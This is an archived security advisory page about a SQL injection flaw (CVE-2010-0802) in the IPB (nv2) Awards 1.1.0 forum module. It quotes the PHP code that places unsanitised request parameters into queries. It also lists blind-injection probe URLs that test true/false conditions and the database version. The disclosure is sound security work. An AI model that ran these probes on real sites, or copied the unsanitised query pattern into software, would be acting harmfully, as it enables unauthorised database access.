|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | IPB (nv2) Awards > 1.1.0 SQL Injection PoC
|
SecurityAlert : 7077
CVE : CVE-2010-0802
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : nebelfrost77
Published : 06.03.2010
Affected Software : | aleinbeen:%28nv2%29_awards:1.1.0 |
 Advisory Content : #################################################
+
+ IPB (nv2) Awards > 1.1.0 SQL Injection PoC
+
#################################################
+
+ Author: fred777 - [fred777.de]
+ Date: 29.01.2010
+ Link:
http://forums.invisionize.com/nv2-Awards-120-t137847.html
+ Vuln: index.php?autocom=awards&do=view&id=1
+ Greetzz to: Back2hack.cc
+ Contact: nebelfrost77@googlemail.com
+
#################################################
--[ Vuln Code ] --
$this->ipsclass->DB->build_query( array( 'select' => 'a.user_id',
'from' => array( 'awarded' =>
'a' ),
'where' => 'a.award_id=' . $this->ipsclass->input['id'],
'add_join' => array( 0 => array( 'select' =>
'm.members_display_name',
'from' => array( 'members' => 'm' ),
'where' => 'm.id=a.user_id',
'type' => 'left',
) ),
) );
---------------------------------------------------------------------------
-----------
'select' => '*',
'from' => 'awards',
'where' => 'id = "' . $_POST['award'] . '"',
) );
---------------------------------------------------------------------------
-----------
$award_dat['user_id'] = $_GET['id'];
$award_dat['award_id'] = $_POST['award'];
################################################
--[ Exploitable ]--
www.seite.de/index.php?autocom=awards&do=view&id=1[SQL INJECTION]
www.seite.de/index.php?autocom=awards&do=view&id=1+and+1=1 > true
www.seite.de/index.php?autocom=awards&do=view&id=1+and+1=0 > false
www.seite.de/index.php?autocom=awards&do=view&id=1+and+substring(version(),
1,1)=5
www.seite.de/index.php?autocom=awards&do=view&id=1+and+substring(version(),
1,1)=4
################################################
References :
http://www.exploit-db.com/exploits/11297
http://secunia.com/advisories/38407
http://packetstormsecurity.org/1001-exploits/ipbawards-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|